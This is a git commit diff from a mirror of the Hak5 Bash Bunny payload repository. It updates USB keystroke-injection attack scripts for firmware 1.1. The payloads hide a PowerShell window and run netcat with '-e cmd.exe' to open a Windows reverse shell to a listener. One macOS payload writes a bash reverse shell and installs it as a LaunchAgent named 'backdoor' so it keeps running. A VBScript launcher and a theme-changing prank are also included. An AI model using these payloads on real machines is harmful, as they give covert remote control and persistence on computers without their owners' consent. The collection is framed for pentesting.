hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated payloads for fw v1.1 (#176) 

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Fixed additional MacReverseShell

* Added readme.md files

* Added readme.md files

* Added readme.md

* Added readme.md files

* Added readme.md files

* Updated for firmware 1.1

* Updated for firmware 1.1

* Added ThemeChanger and updated for firmware 1.1

* Updated readme.md

* Updated for firmware 1.1 - using RUN command

* Fixed issues with the new RUN - reverted

* Fixed a few script problems

* removed binary and updated readme.md

* added a check for themepack

* edited themechanger readme

* updated readme.md and version
pull/207/head
RalphyZ 2017-04-28 18:49:35 -04:00 committed by Sebastian Kinne
parent ca9e53c5a8
commit 750d384df7
9 changed files with 278 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
payloads/library/execution/RAZ_VBScript/a.vbs
View File

@ -3,7 +3,7 @@ Option Explicit
'==============================================================================
' Title: a.vbs
' Author: RalphyZ
' Version: 1.0
' Version: 1.1
' Target: Windows 7+
'
' Description:
@ -16,7 +16,8 @@ Option Explicit
' listeners while doing a PenTest, and grab multiple reverse
' shells in one trip. Uncomment that if you want the auto-increment
'
' Note: You must put the netcat executable in the strReverseShellPath directory
' Note: You must put the netcat executable in the switch directory with this
' script in order for it to work
'==============================================================================
' Declare Constants
@ -26,14 +27,11 @@ Const ForWriting = 2
' Declare Global Variables
Dim strListenerPort, strNewListenerPort, strListenerIP
Dim objFSO, objFile, strCurrentDirectory
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
Dim strNetCatEXE, strListnerPortFile, strListenerIPFile
' The netcat executable name
strNetCatEXE = "nc.exe"
' The folder location
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
' The file containing the listener port
strListnerPortFile = "listener_port.txt"
@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt"
' Create a File System Object
Set objFSO = CreateObject("Scripting.FileSystemObject")
strCurrentDirectory = FindCurrentDirectory()
' Set default value
strCurrentDirectory = ""
' The folder location
FindCurrentDirectory
' Read the Host IP Address (where the listener resides)
ReadHostIP
@ -64,20 +66,21 @@ StartNetCat
' Return Value: None
' Description: Find the netcat executable
'==============================================================================
Function FindCurrentDirectory
sub FindCurrentDirectory
Dim objDrives, d
' Set default return value
FindCurrentDirectory = ""
' Search all drives for the netcat exe
Set objDrives = objFSO.Drives
For Each d in objDrives
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
FindCurrentDirectory = d + strReverseShellPath
For Each d in objDrives
If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then
strCurrentDirectory = d + "\payloads\switch1\"
exit sub
ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then
strCurrentDirectory = d + "\payloads\switch2\"
exit sub
End if
Next
End Function
End Sub
'==============================================================================
' Name: ReadHostIP

35
payloads/library/execution/RAZ_VBScript/payload.txt
View File

@ -2,34 +2,45 @@
#
# Title: RAZ_VBScript
# Author: RalphyZ
# Version: 1.0
# Version: 1.1
# Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file
#
# Description: Executes a VBScript, concealed in a hidden PowerShell window
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# Light-Blue (blinking).....a.vbs was not found
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL | Red slow blink | Could not find the a.vbs script |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
LED G
# Magenta solid
LED SETUP
# Set the attack mode
ATTACKMODE HID STORAGE
# Get the switch position
source bunny_helpers.sh
GET SWITCH_POSITION
# Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED B G 100
Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED FAIL
exit 1
fi
# Start the attack - yellow single blink
LED ATTACK
# Run the VBScript
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe"
QUACK ENTER
# Green LED for finished
LED R G B
# Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
exit 0

31
payloads/library/execution/RAZ_VBScript/readme.md Normal file
View File

@ -0,0 +1,31 @@
# RAZ_VBScript
* Author: RalphyZ
* Version: 1.1
* Target: Windows 7+
* Category: Execution
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
a.vbs - VBScript to be executed in a hidden Powershell window
## Description
VBScript (a.vbs) in the switch folder with this file
## Configuration
None
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL | Red slow blink | Could not find the a.vbs script |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |

48
payloads/library/prank/RAZ_ThemeChanger/payload.txt Normal file
View File

@ -0,0 +1,48 @@
#!/bin/bash
#
# Title: Change windows theme
# Author: sil3n7h
# Version: 1.2
# Target: Windows 7+
#
# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder
# in the payloads library of the Bash Bunny USB Disk partition.
#
# Colors:
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL1 | Red slow blink | Could not find the theme.themepack file |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid
LED SETUP
# Get the switch position
GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then
LED FAIL1
exit 1
fi
# Set the attack mode to HID and STORAGE
ATTACKMODE HID STORAGE
# Yellow single blink
LED ATTACK
# Run the command to change the theme
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')"
QUACK ENTER
# Wait a bit so that the correct window closes
QUACK DELAY 15000
QUACK ALT F4
# Green LED for finished
LED FINISH

34
payloads/library/prank/RAZ_ThemeChanger/readme.md Normal file
View File

@ -0,0 +1,34 @@
# RAZ_ThemeChanger
* Author: sil3n7h
* Version: 1.2
* Target: Windows 7+
* Category: Prank
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ---------------------------------------|
| 1.2 | Updated docs and check for themepack |
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen.
Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`.
## Description
Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition.
## Configuration
None
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL1 | Red slow blink | Could not find the theme.themepack file |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |

25
payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
View File

@ -2,7 +2,7 @@
#
# Title: RAZ_MacReverseShell
# Author: RalphyZ
# Version: 1.1
# Version: 1.2
# Target: Mac OSX
# Dependencies: None
#
@ -12,8 +12,14 @@
# user-defined interval
#
# Colors:
# Green (blinking)..........Working
# White.....................Completed without error
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
#Magenta solid
LED SETUP
# Edit this to point to the NetCat Listener
LISTENER_IP="192.168.1.100"
@ -24,15 +30,15 @@ FREQUENCY="60"
#----Proceed with Caution------------------------------------------------------
# Green blinking LED
LED G 100
# Human Interface Device
ATTACKMODE HID
# Emulate the Ducky - QUACK!
QUACK DEFAULT_DELAY 300
# Start the attack - yellow single blink
LED ATTACK
# Start the Mac Terminal
QUACK COMMAND SPACE
QUACK STRING terminal
@ -53,7 +59,7 @@ QUACK ENTER
QUACK DELAY 500
# Add to the Launch Agents
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\\n \<dict\>\\n \<key\>Label\</key\>\\n \<string\>com.ralphyz.backdoor\</string\>\\n \<key\>ProgramArguments\</key\>\\n \<array\>\\n \<string\>/bin/sh\</string\>\\n \<string\>/tmp/s.sh\</string\>\\n \</array\>\\n \<key\>RunAtLoad\</key\>\\n \<true/\>\\n \<key\>StartInterval\</key\>\\n \<integer\>${FREQUENCY}\</integer\>\\n \<key\>AbandonProcessGroup\</key\>\\n \<true/\>\\n \</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\<dict\>\<key\>Label\</key\>\<string\>com.ralphyz.backdoor\</string\>\<key\>ProgramArguments\</key\>\<array\>\<string\>/bin/sh\</string\>\<string\>/tmp/s.sh\</string\>\</array\>\<key\>RunAtLoad\</key\>\<true/\>\<key\>StartInterval\</key\>\<integer\>${FREQUENCY}\</integer\>\<key\>AbandonProcessGroup\</key\>\<true/\>\</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK ENTER
QUACK DELAY 500
@ -64,5 +70,6 @@ QUACK ENTER
# Close the Terminal Window
QUACK COMMAND q
# White LED for finished
LED R G B
# Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
exit 0

39
payloads/library/remote_access/RAZ_MacReverseShell/readme.md Normal file
View File

@ -0,0 +1,39 @@
# RAZ_MacReverseShell
* Author: RalphyZ
* Version: Version 1.1.1
* Target: Mac OSX
* Category: Reverse Shell
* Attackmode: HID
## Change Log
| Version | Changes |
| ------- | ---------------------------------------- |
| 1.1.1 | Updated for firmware 1.1.1 |
| 1.1 | Added variables for easier customization |
| 1.0 | Initial release |
## Dependencies
None
## Description
Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup
## Configuration
Set the location of your listener:
LISTENER_IP="192.168.1.100"
LISTENER_PORT="4444"
Set the frequency you want the script to run (in minutes)
FREQUENCY="60"
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |

42
payloads/library/remote_access/RAZ_ReverseShell/payload.txt
View File

@ -13,63 +13,69 @@
# Intentionally, this script leaves a trace in the Run Box
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# White (blinking)..........Incrementing the port in listener_port.txt
# Blue (blinking)...........listener_port.txt was not found
# Light-Blue (blinking).....listener_ip.txt was not found
# Amber (blinking)..........nc.exe was not found
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL1 | Red slow blink | Could not find the listener_port.txt file |
# | FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
# | FAIL3 | Red very fast blink | Could not find the nc.exe file |
# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid
LED SETUP
# Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false
LED G
# Set attack mode to HID and Storage
ATTACKMODE HID STORAGE
LANGUAGE='us'
# Get the switch position
source bunny_helpers.sh
GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
LED B 100
LED FAIL1
exit 1
else
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
LED B G 100
LED FAIL2
exit 1
else
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
LED R G 100
LED FAIL3
exit 1
fi
# Start the attack - yellow single blink
LED ATTACK
# Execute the powershell command in the run box with the appropriate variables
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"
QUACK ENTER
# If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ] ; then
LED R G B 100
LED SPECIAL
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
# Allow the write to sync to the USB
sleep 1
fi
# Signal everything went OK - white
LED R G B
# Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
exit 0

44
payloads/library/remote_access/RAZ_ReverseShell/readme.md Normal file
View File

@ -0,0 +1,44 @@
# RAZ_ReverseShell
* Author: RalphyZ
* Version: 1.1
* Target: Windows 7+
* Category: Reverse Shell
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
nc.exe - Windows binary for netcat with the -e flag
Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat
listener_port.txt - The Port number for the netcat listener
listener_ip.txt - The IP Address for the netcat listener
## Description
Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.
## Configuration
Set the location of your listener in the listener_ip and listener_port text files.
If you want the listener port to auto-increment, set:
auto_increment=true
## Colors
| Status | Color | Description |
| ---------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL1 | Red slow blink | Could not find the listener_port.txt file |
| FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
| FAIL3 | Red very fast blink | Could not find the nc.exe file |
| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |